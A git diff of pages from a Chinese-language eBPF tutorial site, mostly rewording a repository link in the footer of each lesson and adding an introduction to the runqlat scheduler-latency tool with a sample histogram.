    这段程序是一个 eBPF 程序,通过使用 fentry 和 fexit 捕获 do_unlinkat 和 do_unlinkat_exit 函数,并通过使用 bpf_get_current_pid_tgid 和 bpf_printk 函数获取调用 do_unlinkat 的进程 ID、文件名和返回值,并在内核日志中打印出来。

    编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令,并通过查看 /sys/kernel/debug/tracing/trace_pipe 文件查看 eBPF 程序的输出。更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

    -

    完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

    +

    如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/4-opensnoop/index.html b/4-opensnoop/index.html index 4b4f70e..5784cca 100644 --- a/4-opensnoop/index.html +++ b/4-opensnoop/index.html @@ -83,7 +83,7 @@ @@ -231,7 +231,7 @@ Runing eBPF program...

本文介绍了如何使用 eBPF 程序来捕获进程打开文件的系统调用。在 eBPF 程序中,我们可以通过定义 tracepoint__syscalls__sys_enter_open 和 tracepoint__syscalls__sys_enter_openat 函数并使用 SEC 宏把它们附加到 sys_enter_open 和 sys_enter_openat 两个 tracepoint 来捕获进程打开文件的系统调用。我们可以使用 bpf_get_current_pid_tgid 函数获取调用 open 或 openat 系统调用的进程 ID,并使用 bpf_printk 函数在内核日志中打印出来。在 eBPF 程序中,我们还可以通过定义一个全局变量 pid_target 来指定要捕获的进程的 pid,从而过滤输出,只输出指定的进程的信息。

通过学习本教程,您应该对如何在 eBPF 中捕获和过滤特定进程的系统调用有了更深入的了解。这种方法在系统监控、性能分析和安全审计等场景中具有广泛的应用。

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/404.html b/404.html index 7487a0b..2fff603 100644 --- a/404.html +++ b/404.html @@ -84,7 +84,7 @@ diff --git a/5-uprobe-bashreadline/index.html b/5-uprobe-bashreadline/index.html index c98c71a..d4aebc8 100644 --- a/5-uprobe-bashreadline/index.html +++ b/5-uprobe-bashreadline/index.html @@ -83,7 +83,7 @@ @@ -233,7 +233,7 @@ Runing eBPF program...

总结

在上述代码中,我们使用了 SEC 宏来定义了一个 uprobe 探针,它指定了要捕获的用户空间程序 (bin/bash) 和要捕获的函数 (readline)。此外,我们还使用了 BPF_KRETPROBE 宏来定义了一个用于处理 readline 函数返回值的回调函数 (printret)。该函数可以获取到 readline 函数的返回值,并将其打印到内核日志中。通过这样的方式,我们就可以使用 eBPF 来捕获 bash 的 readline 函数调用,并获取用户在 bash 中输入的命令行。

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/6-sigsnoop/index.html b/6-sigsnoop/index.html index a0eb6f7..039c8fd 100644 --- a/6-sigsnoop/index.html +++ b/6-sigsnoop/index.html @@ -83,7 +83,7 @@ @@ -258,7 +258,7 @@ Runing eBPF program...

并使用一些对应的 API 进行访问,例如 bpf_map_lookup_elem、bpf_map_update_elem、bpf_map_delete_elem 等。

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/7-execsnoop/index.html b/7-execsnoop/index.html index deea97e..6231369 100644 --- a/7-execsnoop/index.html +++ b/7-execsnoop/index.html @@ -83,7 +83,7 @@ @@ -236,7 +236,7 @@ TIME PID PPID UID COMM

就可以往用户态直接发送信息。

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/8-exitsnoop/index.html b/8-exitsnoop/index.html index 190f304..e4b0ea0 100644 --- a/8-exitsnoop/index.html +++ b/8-exitsnoop/index.html @@ -83,7 +83,7 @@ diff --git a/9-runqlat/index.html b/9-runqlat/index.html index fb045fb..1bd027f 100644 --- a/9-runqlat/index.html +++ b/9-runqlat/index.html @@ -83,7 +83,7 @@ @@ -148,6 +148,44 @@

eBPF (Extended Berkeley Packet Filter) 是 Linux 内核上的一个强大的网络和性能分析工具。它允许开发者在内核运行时动态加载、更新和运行用户定义的代码。

runqlat 是一个 eBPF 工具,用于分析 Linux 系统的调度性能。具体来说,runqlat 用于测量一个任务在被调度到 CPU 上运行之前在运行队列中等待的时间。这些信息对于识别性能瓶颈和提高 Linux 内核调度算法的整体效率非常有用。

runqlat 原理

+

本教程是 eBPF 入门开发实践系列的第九部分,主题是 "捕获进程调度延迟"。在此,我们将介绍一个名为 runqlat 的程序,其作用是以直方图的形式记录进程调度延迟。

+

Linux 操作系统使用进程来执行所有的系统和用户任务。这些进程可能被阻塞、杀死、运行,或者正在等待运行。处在后两种状态的进程数量决定了 CPU 运行队列的长度。

+

进程有几种可能的状态,如:

+
    +
  • 可运行或正在运行
  • +
  • 可中断睡眠
  • +
  • 不可中断睡眠
  • +
  • 停止
  • +
  • 僵尸进程
  • +
+

等待资源或其他函数信号的进程会处在可中断或不可中断的睡眠状态:进程被置入睡眠状态,直到它需要的资源变得可用。然后,根据睡眠的类型,进程可以转移到可运行状态,或者保持睡眠。

+

即使进程拥有它需要的所有资源,它也不会立即开始运行。它会转移到可运行状态,与其他处在相同状态的进程一起排队。CPU可以在接下来的几秒钟或毫秒内执行这些进程。调度器为 CPU 排列进程,并决定下一个要执行的进程。

+

根据系统的硬件配置,这个可运行队列(称为 CPU 运行队列)的长度可以短也可以长。短的运行队列长度表示 CPU 没有被充分利用。另一方面,如果运行队列长,那么可能意味着 CPU 不够强大,无法执行所有的进程,或者 CPU 的核心数量不足。在理想的 CPU 利用率下,运行队列的长度将等于系统中的核心数量。

+

进程调度延迟,也被称为 "run queue latency",是衡量线程从变得可运行(例如,接收到中断,促使其处理更多工作)到实际在 CPU 上运行的时间。在 CPU 饱和的情况下,你可以想象线程必须等待其轮次。但在其他奇特的场景中,这也可能发生,而且在某些情况下,它可以通过调优减少,从而提高整个系统的性能。

+

我们将通过一个示例来阐述如何使用 runqlat 工具。这是一个负载非常重的系统:

+
# runqlat
+Tracing run queue latency... Hit Ctrl-C to end.
+^C
+     usecs               : count     distribution
+         0 -> 1          : 233      |***********                             |
+         2 -> 3          : 742      |************************************    |
+         4 -> 7          : 203      |**********                              |
+         8 -> 15         : 173      |********                                |
+        16 -> 31         : 24       |*                                       |
+        32 -> 63         : 0        |                                        |
+        64 -> 127        : 30       |*                                       |
+       128 -> 255        : 6        |                                        |
+       256 -> 511        : 3        |                                        |
+       512 -> 1023       : 5        |                                        |
+      1024 -> 2047       : 27       |*                                       |
+      2048 -> 4095       : 30       |*                                       |
+      4096 -> 8191       : 20       |                                        |
+      8192 -> 16383      : 29       |*                                       |
+     16384 -> 32767      : 809      |****************************************|
+     32768 -> 65535      : 64       |***                                     |
+
+

在这个输出中,我们看到了一个双模分布,一个模在0到15微秒之间,另一个模在16到65毫秒之间。这些模式在分布(它仅仅是 "count" 列的视觉表示)中显示为尖峰。例如,读取一行:在追踪过程中,809个事件落入了16384到32767微秒的范围(16到32毫秒)。

+

在后续的教程中,我们将深入探讨如何利用 eBPF 对此类指标进行深度跟踪和分析,以更好地理解和优化系统性能。同时,我们也将学习更多关于 Linux 内核调度器、中断处理和 CPU 饱

runqlat 的实现利用了 eBPF 程序,它通过内核跟踪点和函数探针来测量进程在运行队列中的时间。当进程被排队时,trace_enqueue 函数会在一个映射中记录时间戳。当进程被调度到 CPU 上运行时,handle_switch 函数会检索时间戳,并计算当前时间与排队时间之间的时间差。这个差值(或 delta)被用于更新进程的直方图,该直方图记录运行队列延迟的分布。该直方图可用于分析 Linux 内核的调度性能。

runqlat 代码实现

runqlat.bpf.c

@@ -305,7 +343,7 @@ int BPF_PROG(handle_sched_switch, bool preempt, struct task_struct *prev, struct char LICENSE[] SEC("license") = "GPL"; -

首先,定义了一些常量和全局变量:

+

这其中定义了一些常量和全局变量,用于过滤对应的追踪目标:

#define MAX_ENTRIES 10240
 #define TASK_RUNNING  0
 
@@ -482,11 +520,17 @@ comm = cpptools
         64 -> 127        : 8        |*****************************           |
        128 -> 255        : 3        |**********                              |
 
+

完整源代码请见:https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/9-runqlat

+

参考资料:

+

总结

runqlat 是一个 Linux 内核 BPF 程序,通过柱状图来总结调度程序运行队列延迟,显示任务等待运行在 CPU 上的时间长度。编译这个程序可以使用 ecc 工具,运行时可以使用 ecli 命令。

runqlat 是一种用于监控Linux内核中进程调度延迟的工具。它可以帮助您了解进程在内核中等待执行的时间,并根据这些信息优化进程调度,提高系统的性能。可以在 libbpf-tools 中找到最初的源代码:https://github.com/iovisor/bcc/blob/master/libbpf-tools/runqlat.bpf.c

更多的例子和详细的开发指南,请参考 eunomia-bpf 的官方文档:https://github.com/eunomia-bpf/eunomia-bpf

-

完整的教程和源代码已经全部开源,可以在 https://github.com/eunomia-bpf/bpf-developer-tutorial 中查看。

+

如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 https://github.com/eunomia-bpf/bpf-developer-tutorial 以获取更多示例和完整的教程。

diff --git a/bcc-documents/kernel-versions.html b/bcc-documents/kernel-versions.html index 6b739c1..4a19435 100644 --- a/bcc-documents/kernel-versions.html +++ b/bcc-documents/kernel-versions.html @@ -83,7 +83,7 @@ @@ -636,7 +636,7 @@ kernel can be retrieved with: